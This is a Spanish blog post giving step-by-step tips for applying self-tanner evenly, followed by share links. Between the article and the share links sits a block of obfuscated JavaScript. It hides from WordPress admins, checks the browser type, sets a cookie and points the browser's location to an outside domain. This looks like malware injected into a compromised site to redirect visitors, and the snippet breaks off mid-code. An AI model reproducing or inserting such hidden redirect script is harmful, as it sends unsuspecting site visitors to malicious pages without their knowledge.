El autobronceador aporta un tono más bronceado a nuestra piel, por ello hay que aplicarlo cuidadosamente para que quede lo más uniforme posible.
La forma correcta de aplicación es la siguiente:
1-. Limpiar bien la piel con un baño y exfoliarla para que no queden residuos de suciedad y eliminar las células muertas.
2-. Es recomendable utilizar unos guantes de plástico/silicona a la hora de aplicar el producto, así evitaremos que se manchen las palmas de las manos. De no utilizar guantes, lavar bien las manos con agua y jabón.
3-. Debe aplicarse de forma uniforme en todas las zonas del cuerpo, en especial en rodillas y codos que es donde se acumula el producto dando lugar a anti-estéticas manchas. El truco está en aplicar una cantidad generosa de autobronceador, así evitarás huecos y manchas en la piel.
4-. Es importante aplicarlo también en zonas menos visibles como las orejas o la nuca para que no se note la diferencia de color con el rostro.
Mantén tu bronceado por más tiempo de forma segura y sin producir daños nocivos a la piel.
#BronceadoSeguro 🙂

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone